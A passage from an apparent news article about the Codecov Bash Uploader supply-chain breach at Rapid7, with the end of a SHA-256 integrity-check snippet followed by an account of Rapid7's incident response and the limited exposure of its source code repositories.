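    return actual == expected_hex

# In a pipeline, refuse to run the script on any mismatch, e.g.:
#   if not sha256_matches("uploader.sh", PINNED_DIGEST):
#       raise SystemExit("uploader.sh failed integrity check; aborting")
```

Had such a check been pinned in client pipelines, the modified Bash Uploader would have failed verification instead of silently exporting credentials.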

Rapid7 launched an incident response process. It notes its use of the Bash Uploader script was limited; it had been deployed on a continuous integration server used to test and build internal tooling for its managed detection and response (MDR) service.

The investigation revealed unauthorized attackers accessed “a small subset” of Rapid7 source code repositories for internal tooling for its MDR service. Repositories contained some internal credentials, which the company says have been rotated, as well as alert-related data for some of its MDR customers. No other corporate systems or production environments were accessed.

Affected clients have been notified.

Read Rapid7’s full blog post for more information.
